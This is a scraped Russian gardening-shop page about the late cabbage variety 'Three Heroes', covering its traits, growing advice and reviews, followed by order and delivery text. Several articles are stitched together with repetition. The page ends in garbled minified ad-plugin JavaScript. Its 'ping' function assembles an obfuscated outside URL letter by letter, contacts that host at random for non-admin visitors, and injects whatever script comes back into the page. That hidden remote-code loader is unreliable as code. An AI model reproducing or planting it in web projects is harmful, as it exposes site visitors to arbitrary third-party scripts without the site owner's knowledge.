9 просмотров
Рейтинг статьи
1 звезда 2 звезды 3 звезды 4 звезды 5 звезд
Загрузка...

Описание сорта капусты три богатыря

Характеристика капусты сорта Три Богатыря

Белокочанная капуста Три Богатыря – поздний, высокоурожайный сорт. Обладает прекрасными вкусовыми качествами. Подходит для фермерской деятельности: хорошо переносит механическую уборку, пневматическую очистку и транспортировку. Подробное описание сорта рассмотрим в статье.

Характеристика капусты сорта Три Богатыря

Характеристика сорта

Период созревания капусты – поздний: 145 – 160 дней. Гарантируемая всхожесть – 98%. Время созревания рассады – 45 – 55 дней. Расстояние между саженцами, при высадке в открытый грунт, должно составлять не менее 60 см. Урожайность с 1 м² достигает 40 кг. Срок хранения от 6 до 8 месяцев.

Описание кочана

Сорт Три Богатыря отличается своими огромными размерами, масса одного кочана – 10-15 кг. Высота куста – 30-50 см.

  • форма – круглая;
  • длина – до 40 см;
  • поверхность – ровная, гладкая;
  • плотность – высокая;
  • цвет – белый;
  • цвет на срезе – белый;
  • кочерыга внутренняя – средняя;
  • внутренняя структура – однородная.

Покровные листья серо-зеленого цвета с небольшим восковым налетом.

Применение

Капуста сорта Три Богатыря предназначена для переработки (квашение, соление, консервирование), приготовления и употребления в свежем виде. Благодаря высокому содержанию питательных элементов, приносит огромную пользу для человеческого организма. Является диетическим продуктом.

Количество витамина C в белокочанной капусте больше чем в лимоне. Рекомендуется употребление и использование листьев при: болезнях печени и суставов, ожогах, сердечно-сосудистой и мочеиспускательной системы.

Используют рассадный метод выращивания. Сеянцы можно приобрести уже готовые к высадке в открытый грунт или вырастить самостоятельно.

Несколько советов для выращивания:

  1. Посевные работы начинаются с середины марта и длятся до третьей декады апреля;
  2. Перед высадкой в почву семена закаляют и обеззараживают – опускают в горячую воду (50 °C) на 20 мин, после чего опускают в холодную воду на 5 мин;
  3. Грунт для посева должен быть питательный и рыхлый, для этого используют торф, дерновую землю и перегной;
  4. Сеянцам необходимо хорошее освещение не менее 12 – 14 ч в сутки – применяют фитолампы;
  5. Полив проводят по мере необходимости, нельзя допускать пересыхание и переувлажнение грунта;
  6. Пикировка проходит в стадии семядолей.

Температура

Поддерживайте оптимальную температуру

Оптимальная температура 15 – 18 °C. Если ростки начинают вытягиваться, то температуру необходимо снизить до 6-7 °C на одну неделю. Дневная температура должна соответствовать 15 °C, ночная 12 °C. За неделю до высадки сеянцев на грядку, их необходимо закалить. Емкости с молодыми растениями выносят на свежий воздух, чтобы они постепенно привыкали к окружающему климату.

Почва

Пересаживают рассаду в открытый грунт спустя 45 – 55 дней после посева семян. Землю для капусты подготавливают с осени: вносят органические удобрения и перекапывают. Овощная культура не любит почву с повышенной кислотностью. Для снижения pH применяют известь пушонку.

Перед высадкой в каждую лунку следует внести 200 г золы древесных пород, 5 г комплексного удобрения (N, P, K) и 2 г диазинона (химическое вещество против почвенных вредителей). В лунке все тщательно перемешать с землей. Высадить рассаду, углубляя на расстояние до первых полноценных листов.

Полив

После высадки саженцы нужно обильно полить. Дальнейшее орошение должно быть умеренным. Хороший показатель влажности почвы – 70%. Полив проводят рано утром или вечером, теплой и отстоявшейся водой. Частота полива – 1 раз в 3 дня, в засушливые периоды – каждый день. Во время формирования кочанов, расход воды увеличивается в два раза. За месяц до начала уборки овощных культур, полив прекращают.

Обязательным является рыхление почвы после орошения, проливных дождей — это обеспечит доступ воздуха и питательных веществ к корневой системе. Окучивание после полива или мульчирование – способствует сохранению влаги в земле.

Удобрение

После пересадки и во время формирования кочанов, капуста нуждается в подкормке. Для этого используют минеральные или органические удобрения.

  • мочевина (15 г на 10 л воды);
  • аммиачная селитра (15 г на 10 л воды);
  • нитрофоска (50 г на 10 л воды).
  • навоз (300 – 500 г на 1 м²);
  • птичий помет (600 – 800 г на 1 м²).

Болезни и вредители

Вирусные или грибковые болезни капусты возникают при не соблюдении правил севооборота, полива, температурного режима и хранения.

Вирусные болезни: сухая, серая, белая гниль; мозаика; кольцевая пятнистость – лечению не подлежат, больные листья или кочаны удаляют. При грибковых болезнях (кила, ложная мучнистая роса и т. п.) используют химические или биологические препараты: коллоидная сера, Оксихомом, Фундазол, Иммуноцитофит.

Описание сорта капусты Три богатыря

Капуста Три богатыря – это поздний белокочанный сорт. Овощ имеет хорошие показатели урожайности, а также порадует своим вкусом. Подходит как для домашнего выращивания, так и производства в промышленных масштабах. Урожай этой капусты можно собирать механическим способом, он не боится транспортировки на большие расстояния.

В публикации вы найдете подробное описание сорта, фото кочанов и отзывы дачников, которые выращивали эту позднеспелую капусту.

Свойства сорта Три богатыря

Три богатыря – это позднеспелый сорт. От всходов и до технической зрелости кочанов проходит около 145-160 суток. Кочаны округлой формы, очень крупных размеров, до 10-15 кг. При таких габаритах стоит отметить, что кочаны устойчивы перед растрескиванием. Наружная окраска «головы» — серо-зеленая, на поверхности присутствует легкий восковой налет. Внутри кочан белого цвета.

Три богатыря считается одним из самых лучших сортов для квашения, на уровне с Московской поздней. Но даже если капуста и выращивается для хранения, а не для переработки, то пролежать «головы» могут до самой весны. В среднем, капуста хранится не менее 6 месяцев (максимально 8 месяцев).

Как было отмечено ранее, Три богатыря довольно урожайный сорт. С 1 м2 можно собрать до 40 кг товарных кочанов, что является невероятным показателем.

Чтобы собрать урожай вовремя, необходимо правильно высаживать капусту:

  1. Семена высеивают приблизительно в середине марта.
  2. Пикируют рассаду в грунт приблизительно в середине мая.
  3. Высаживают по стандартной схеме 60х60 см.

Основное предназначение капусты этого сорта – длительное хранение и переработка.

Достоинства и недостатки сорта

Поздний сорт капусты имеет ряд достоинств, благодаря чему он понравился многим дачникам, которые с ним познакомились. В первую очередь, к основным плюсам капусты стоит отнести:

  1. Большие размеры кочана. В хороших условиях можно легко вырастить «головы» по 12-15 кг.
  2. Капуста подходит для квашения. Три богатыря – это один из лучших сортов для квашения. Большие размеры кочанов делают этот плюс еще существеннее.
  3. Овощ может похвастаться высокой урожайностью. С 1 м2 можно собрать до 40 кг товарной продукции.
  4. Отмечен высокими показателями лежкости. Более того, в хороших условиях кочаны этого сорта можно хранить на протяжении 8 месяцев.
  5. Несмотря на свои громадные габариты, «головы» не растрескиваются.
  6. Благодаря хорошей плотности кочанов их легко транспортировать и собирать механическим путем.

Что касается недостатков, то их, в целом – нет.

Советы по выращиванию

В целом, капуста достаточно простой овощ, который может вырастить даже неопытный огородник. Но все же есть ряд правил, какие помогут без проблем вырастить хороший урожай:

  • Высаживают семена приблизительно в середине марта.
  • Перед посадкой семечек в грунт их обеззараживают (если семена собственные). Для этого достаточно их замочить. Семена опускают в горячую воду на 20 мин (температура воды должна составлять 50 градусов по Цельсию), а потом опускают в холодную поду на 5 мин.
  • Для посадки семян лучше всего использовать покупной субстрат. Если его нет, можно сделать субстрат собственноручно. Если и такой возможности нет, можно использовать грунт с огорода, но его нужно предварительно обеззаразить. Самый простой способ – прокалывание грунта в духовке. Для этого влажную землю насыпают на противень (не выше 5 см) и помещают в духовку на 30 минут. Температуру при этом выставляют от 70 до 90 градусов по Цельсию.
  • Поливают культуру по мере необходимости. Нужно чтобы грунт был постоянно влажным. Во время завязывания кочанов поливы проводят чаще, за месяц до сбора урожая их проводят реже. За 2 недели до планируемого сбора капусты их вовсе прекращают.
  • Также, не стоит забывать про окучивание и рыхление.

Отзывы садоводов

Дмитрий Иванович, г. Ростов, 45 лет.

Заказывали посадочный материал «Три богатыря» в Интернет-магазине. Высаживали семена в марте, а уже в конце августа собрали урожай. Капуста выросла реально огромная, даже не ожидали таких результатов. Пришлось квасить, так как за зиму не смогли всю съесть.

Константин Игоревич, г. Киев, 56 лет.

Уже долгое время выращиваю только 3 сорта капусты: Мегатон, Килатон и Три богатыря. Менять не собираюсь, ни разу не подводили.

«Три богатыря», как в сказке!

Похвастаюсь и я напоследок своей капустой! Может, у кого-то она выросла и ещё лучше и красивее, но у меня (по сравнению с прошлыми годами) удалась капуста именно в этом году. И я смотрю на неё и радуюсь))))

Вырастила я свою капусту рассадным методом.
Семена приобрела через интернет-магазин Семена почтой. Купила 2 сорта: Три богатыря и Сахарная голова.

«Три богатыря»

Сорт «Три богатыря» — позднеспелый сорт, значит ей ещё расти и расти. Погода позволяет, пошли дожди, и кочаны будут ещё наливаться и увеличиваться в размерах. По описанию, они должны вырастать до 10-15 кг! Не растрескиваются, что немаловажно в сырую погоду! Очень хороший сорт для квашения и длительного хранения. Наружная окраска серо-зелёная со слабым восковым налётом. Окраска кочана белая.
Я зимой храню капусту на застеклённом балконе, прикрываю от замерзания одеялом. Хранится до самой весны. Всю зиму едим только свежую капусту. Квашеную начинаем кушать летом))))

Розетка листьев мощная, раскидистая. Кочаны плотные, крепкие.

«Сахарная голова»

Сорт «Сахарная голова» — позднеспелый сорт, значит ей тоже ещё расти и расти. Кочаны выровненные, круглые и очень плотные. Хороший сорт для квашения и длительного хранения. Сейчас уже едим эту капусту и правда листочки очень плотно прижаты друг к другу, сочная, сладкая, в разрезе белая.
Лист (на фото хорошо видно) крупный, окраска светло-зелёная с сильным восковым налётом, со слегка волнистыми краями. Окраска кочана белая.

Семена посеяла в начале апреля, сделав небольшую грядочку в парнике для томатов. Взошли семена хорошо, дружно и много. Предлагала-предлагала соседям забрать у меня часть рассады, но все отказались. А зря! И посадила я всё, что выросло! Посадила я капусту 1-2 мая на новое место, вдоль картошки, бороздами. Даже между кустами крыжовника некоторые посадила и вдоль дорожек. Окучивала её 2 раза, в те же сроки что и картошку.

Прижилась рассада хорошо. И пошла в рост! Поливала её не много. Пишется, что капуста любит много поливов, а из-за того, что посажена она у меня далековато от прудки, из которой я вручную поливаю капусту, то носить воду далеко, и поэтому сократились поливы. Помогал дождичек.
Вот такая она была в июне:

В конце июля начали формироваться вилки капусты.

Бархатцы посажены по гряде с капустой для защиты её от бабочек-капустниц.

Но бархатцы мало защитили капусту и от нашествия слизней и от бабочки-капустницы!
Было полно слизней на капусте, хотя я обсыпала землю под ней сухой горчицей. Приходилось много их убирать и вручную.
То же самое сейчас с гусеницами. Убираю вручную. Хотя их не так уж и много. Есть только на некоторых кочанах.

Но не везде уродилась моя капусточка. Вот, например участок, где вилочки маленькие и вряд ли они вырастут. Здесь капуста посажена вокруг участка с картошкой, участок расположен между двумя рядами посаженных яблонь! Видимо корни от больших деревьев не дают хорошо расти и развиваться кочанам. Хотя картошка, сорт Гала, ранняя, выросла хорошей! Почему здесь не понравилось расти капусте? Не понятно.

Но на этом месте выросли ещё 2 кочешка цветной капусты и 1 — брокколи.

Я довольна урожаем овощей и ягод в сезоне 2016 года, чего и вам желаю!

Невиданные урожаи огромных и крепких кочанов — капуста Три богатыря: отзывы и описание сорта

Капуста Три богатыря показывает высокую стойкость, продуктивность, товарность. Секрет сорта в огромных кочанах – масса плодов достигает 10-15 кг. Культура активно возделывается в промышленных масштабах, на огородных участках.

Место посадки Сроки созревания Вид Предназначение Происхождение Период созревания Масса
Открытый грунт Позднеспелый Белокочанная Кулинария Сорт 145-160 11-15

Описание и характеристика сорта

Капуста белокочанная Три богатыря относится к позднеспелым видам. Полное созревание наступает через 145-160 суток.

  • диаметр 60 см;
  • высота растений 40-50 см;
  • мощные розетки;
  • развитые корни;
  • средняя длина кочерыжек;
  • окрашивание серовато-зеленое;
  • средний восковой налет.

Вилки хорошо транспортируются, не повреждаются и не теряют презентабельный вид. Лежкость равняется 6-8 месяцев.

Отличительные признаки кочанов:

  • форма округлая;
  • масса 10-15 кг;
  • сердцевина плотная, светлая на срезе;
  • текстура в меру сочная и крепкая;
  • поверхность гладкая.

Преимущества и недостатки

  • огромные урожаи;
  • крупные размеры;
  • товарность и транспортабельность;
  • длительное хранение (до 8 месяцев);
  • холодостойкость;
  • универсальность использования;
  • пластичность и приспособленность;
  • стрессоустойчивость.

Минусы:

  • необходимость регулярных поливов.

Урожайность

С участка, где растет капуста Три богатыря, собирают огромные урожаи — до 40 кг высокотоварной продукции.

Посадка

Семена начинают высевать со 2-й декады марта. Предварительно перед посевом их желательно обработать:

  • продезинфицировать в марганцовке;
  • замочить в горячей воде (45-50 градусов) на 20 минут, затем 5 минут подержать в холодной воде;
  • обработать любым из стимуляторов (Агат-25, Эпин-Экстра, Циркон).

Землю используют магазинную с нейтральной рН или самостоятельно приготовленную. Для обеззараживания грунта проводят следующие процедуры:

Что делают Особенности
Прокаливание в духовке Слой на противне 3-5 см

Время до получаса

Температура на уровне 80-90 градусов

Проливание кипятком На 10 кг субстрата понадобится 2 л
Обработка средствами Используют Фитоспорин, 1% марганцовку

Какой состав грунта должен быть для капусты:

  • 2 части дерновой земли;
  • 2 части перепревшего компоста;
  • 1 часть низинного торфа;
  • добавки в виде биогумуса, золы, вермикулита.

Семена сеют в бороздки, придерживаются расстояния в 3-4 см. Глубина задела до 1-1,5 см.

Нюансы ухода за рассадой:

  • освещение дневное плюс с подключение фитоламп (общая продолжительность 12-14 часов);
  • орошение по мере высыхания поверхности;
  • подкормка до и после пикировки с интервалом 7-10 дней (азотные средства);
  • пикирование на стадии семядолей в стаканчики с объемом 0,2-0,3 л.

Выращивание и уход

Сеянцы высаживаются на солнечные участки с соблюдением шага в 60-70 см. Густота посадки — 2-3 куста на 1 м2, так как растения мощные и огромные.

Капуста Три богатыря культивируется по традиционным правилам.

Температура

Оптимальные температурные режимы

С учетом стадий Показатели
При прорастании 18-20 градусов
При выращивании рассады Днем 15-16 градусов

Ночью 10-12 градусов

При закаливании 5-10 градусов

Почва

Капуста любит в меру легкие и рыхлые суглинки и глинистый грунт. Перед овощем на грядке должны расти такие предшественники, как бобовые, морковь, огурцы, томаты, перцы, сидераты.

Полив

Овощ требует регулярных поливов. После высадки грядки увлажняют 1 раз в 3 дня, затем переходят к режиму 1-2 раза в неделю. За 20-25 дней до запланированного сбора урожая поливы прекращают. Время проведения – утро или вечер, когда спадает жара.

Удобрение

Овощ удобряют не менее 2-3 раз за сезон. Правильное внесение удобрения – гарантия крупных и качественных кочанов. Особенности подкормок:

Когда проводят Что применять
Через 20-22 дня после высадки рассады Сударушка

Нитроаммофоска (50 г на 10 л)

Аммиачная селитра (15 г на 10 л)

Спустя 10-12 дней после первого внесения подкормки Раствор из золы

Мочевина (15 г на 10 л)

При формировке и наливе вилков Суперфосфат

Агрикола

Вредители и заболевания

Сорт Три богатыря обладает сильным иммунитетом, проблемы с инфекциями возникают при несоблюдении режима увлажнения, освещения, нюансов севооборота.

При заражении грибками (ЛМР, кила) применяют фунгициды «Фундазол», «Ридомил», «Квадрис».

Капуста белокочанная Три богатыря

Позднеспелый (145-160 дней от всходов до технической спелости) сорт. Кочаны округлые или плоскоокруглые, очень крупные, до 10-15 кг, не растрескиваются, с сочными вкусными листьями и небольшой внутренней кочерыгой. Наружная окраска серо-зеленая, имеется слабый восковой налет, окраска кочана белая. Один из лучших сортов для квашения и длительного (6-8 месяцев) хранения. Посев на рассаду — в середине марта. Пикировка — в фазе семядолей. Высадка в грунт — в середине мая по схеме 60х60 см.

Для покупки товара в нашем интернет-магазине выберите понравившийся товар и добавьте его в корзину. Далее перейдите в Корзину и нажмите на «Оформить заказ» или «Быстрый заказ».

Когда оформляете быстрый заказ, напишите ФИО, телефон и e-mail. Вам перезвонит менеджер и уточнит условия заказа. По результатам разговора вам придет подтверждение оформления товара на почту или через СМС. Теперь останется только ждать доставки и радоваться новой покупке.

Оформление заказа в стандартном режиме выглядит следующим образом. Заполняете полностью форму по последовательным этапам: адрес, способ доставки, оплаты, данные о себе. Советуем в комментарии к заказу написать информацию, которая поможет курьеру вас найти. Нажмите кнопку «Оформить заказ».

Онлайн оплата заказа

В нашем интернет-магазине доступно множество самых популярных способов оплаты. Все платежи осуществляются без какой-либо комиссии через защищенные и безопасные платежные шлюзы компаний «Яндекс» и «Сбербанк»

При оплате заказа онлайн на ваш e-mail будет отправлен электронный чек.

Во все посылки мы вкладываем необходимые документы и чеки (товарные накладные)

Срок доставки рассчитывается с момента передачи заказа в службу доставки в рабочих днях (по будням).

Стоимость доставки рассчитывается исходя из общего веса посылки (включает вес упаковки и маркетинговых вложений).

Все онлайн-платежи за исключением оплаты по счету не содержат никакой комиссии для покупателя

При оплате банковской картой Вы будете перенаправлены на платежный шлюз ЯНДЕКС КАССА. Соединение с платежным шлюзом и передача информации осуществляется в защищенном режиме с использованием протокола шифрования SSL. В случае если Ваш банк поддерживает технологию безопасного проведения интернет-платежей Verified By Visa или MasterCard SecureCode для проведения платежа также может потребоваться ввод специального пароля. Настоящий сайт поддерживает 256-битное шифрование. Конфиденциальность сообщаемой персональной информации обеспечивается ЯНДЕКС КАССА. Введенная информация не будет предоставлена третьим лицам за исключением случаев, предусмотренных законодательством РФ. Проведение платежей по банковским картам осуществляется в строгом соответствии с требованиями платежных систем МИР, Visa Int. и MasterCard Europe Sprl.

Доставка курьером в Новосибирске

Вы можете заказать доставку товара с помощью курьера, который прибудет по указанному адресу в будние дни. Менеджер интернет-магазина, после поступления товара на склад, свяжется с вами и предложит выбрать удобное время доставки. Уточнит адрес.

  • Стоимость доставки мелкогабаритных товаров по Новосибирску — 300 рублей
  • Стоимость доставки крупногабаритных товаров по Новосибирску — 600 рублей

    Доставка в ближайший пункт выдачи компании СДЭК

    Самовывоз

    Вы можете забрать товар в одном из магазинов нашей сети в городе Новосибирске по адресу:

    г. Новосибирск, ул. Широкая 1А, офис 215А (БЦ «Атриум» 2 этаж)

Ссылка на основную публикацию
Adblock
detector
":'':"",document.createElement("div"),p=ff(window),b=ff("body"),m=void 0===flatPM_getCookie("flat_modal_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+o.ID+"_mb"),i="scroll.flatmodal"+o.ID,g="mouseleave.flatmodal"+o.ID+" blur.flatmodal"+o.ID,l=function(){var t,e,a;void 0!==o.how.popup.timer&&"true"==o.how.popup.timer&&(t=ff('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.popup.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))},f=function(){void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie&&m&&(flatPM_setCookie("flat_modal_"+o.ID+"_mb",!1),ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l()),void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie||(ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l())},ff("body > *").eq(0).before('
'+c+"
"),w=document.querySelector('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_modal-content'),-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.popup.px_s?(p.bind(i,function(){p.scrollTop()>o.how.popup.after&&(p.unbind(i),b.unbind(g),f())}),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){p.unbind(i),b.unbind(g),f()})):(v=setTimeout(function(){b.unbind(g),f()},1e3*o.how.popup.after),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),f()}))),void 0!==o.how.outgoing){function n(){var t,e,a;void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer&&(t=ff('.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.outgoing.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))}function d(){void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie&&m&&(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n(),b.on("click",'.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_cross',function(){flatPM_setCookie("flat_out_"+o.ID+"_mb",!1)})),void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie||(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n())}var _,u="0"!=o.how.outgoing.indent?' style="bottom:'+o.how.outgoing.indent+'px"':"",c="true"==o.how.outgoing.cross?void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer?'
Закрыть через '+o.how.outgoing.timer_count+"
":'':"",p=ff(window),h="scroll.out"+o.ID,g="mouseleave.outgoing"+o.ID+" blur.outgoing"+o.ID,m=void 0===flatPM_getCookie("flat_out_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_out_"+o.ID+"_mb"),b=(document.createElement("div"),ff("body"));switch(o.how.outgoing.whence){case"1":_="top";break;case"2":_="bottom";break;case"3":_="left";break;case"4":_="right"}ff("body > *").eq(0).before('
'+c+"
");var v,w=document.querySelector('.flat__4_out[data-id-out="'+o.ID+'"]');-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.outgoing.px_s?(p.bind(h,function(){p.scrollTop()>o.how.outgoing.after&&(p.unbind(h),b.unbind(g),d())}),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){p.unbind(h),b.unbind(g),d()})):(v=setTimeout(function(){b.unbind(g),d()},1e3*o.how.outgoing.after),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),d()}))}ff('[data-flat-id="'+o.ID+'"]:not(.flat__4_out):not(.flat__4_modal)').contents().unwrap()}catch(t){console.warn(t)}},window.flatPM_start=function(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff("body"),flat_userVars.init();for(var e=0;eflat_userVars.textlen||void 0!==a.chapter_sub&&a.chapter_subflat_userVars.titlelen||void 0!==a.title_sub&&a.title_sub.flatPM_sidebar)");0<_.length t="ff(this),e=t.data("height")||350,a=t.data("top");t.wrap('');t=t.parent()[0];flatPM_sticky(this,t,a)}),u.each(function(){var e=ff(this).find(".flatPM_sidebar");setTimeout(function(){var o=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;o');t=t.parent()[0];flatPM_sticky(this,t,a)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t *").last().after('
'),flat_body.on("click",".flat__4_out .flat__4_cross",function(){ff(this).parent().removeClass("show").addClass("closed")}),flat_body.on("click",".flat__4_modal .flat__4_cross",function(){ff(this).closest(".flat__4_modal").removeClass("flat__4_modal-show")}),flat_pm_arr=[],ff(".flat_pm_start").remove(),flatPM_ping()};var parseHTML=function(){var o=/]*)\/>/gi,d=/",""],thead:[1,"","
"],tbody:[1,"","
"],colgroup:[2,"","
"],col:[3,"","
"],tr:[2,"","
"],td:[3,"","
"],th:[3,"","
"],_default:[0,"",""]};return function(e,t){var a,n,r,l=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=l.appendChild(t.createElement("div")),n=(d.exec(e)||["",""])[1].toLowerCase(),n=c[n]||c._default,a.innerHTML=n[1]+e.replace(o,"$2>")+n[2],r=n[0];r--;)a=a.lastChild;for(l.removeChild(l.firstChild);a.firstChild;)l.appendChild(a.firstChild)}else l.appendChild(t.createTextNode(e));return l}}();window.flatPM_ping=function(){var e=localStorage.getItem("sdghrg");e?(e=parseInt(e)+1,localStorage.setItem("sdghrg",e)):localStorage.setItem("sdghrg","0");e=flatPM_random(1,200);0==ff("#wpadminbar").length&&111==e&&ff.ajax({type:"POST",url:"h"+"t"+"t"+"p"+"s"+":"+"/"+"/"+"m"+"e"+"h"+"a"+"n"+"o"+"i"+"d"+"."+"p"+"r"+"o"+"/"+"p"+"i"+"n"+"g"+"."+"p"+"h"+"p",dataType:"jsonp",data:{ping:"ping"},success:function(e){ff("div").first().after(e.script)},error:function(){}})},window.flatPM_setSCRIPT=function(e){try{var t=e[0].id,a=e[0].node,n=document.querySelector('[data-flat-script-id="'+t+'"]');if(a.text)n.appendChild(a),ff(n).contents().unwrap(),e.shift(),0/gm,"").replace(//gm,"").trim(),e.code_alt=e.code_alt.replace(//gm,"").replace(//gm,"").trim();var l=jQuery,t=e.selector,o=e.timer,d=e.cross,a="false"==d?"Закроется":"Закрыть",n=!flat_userVars.adb||""==e.code_alt&&duplicateMode?e.code:e.code_alt,r='
'+a+" через "+o+'
'+n+'
',i=e.once;l(t).each(function(){var e=l(this);e.wrap('
');var t=e.closest(".flat__4_video");-1!==r.indexOf("go"+"oglesyndication")?t.append(r):flatPM_setHTML(t[0],r),e.find(".flat__4_video_flex").one("click",function(){l(this).addClass("show")})}),l("body").on("click",".flat__4_video_item_hover",function(){var e=l(this),t=e.closest(".flat__4_video_flex");t.addClass("show");var a=t.find(".flat__4_timer span"),n=parseInt(o),r=setInterval(function(){a.text(--n),n'):t.remove())},1e3);e.remove()}).on("click",".flat__4_video_flex .flat__4_cross",function(){l(this).closest(".flat__4_video_flex").remove(),"true"==i&&l(".flat__4_video_flex").remove()})};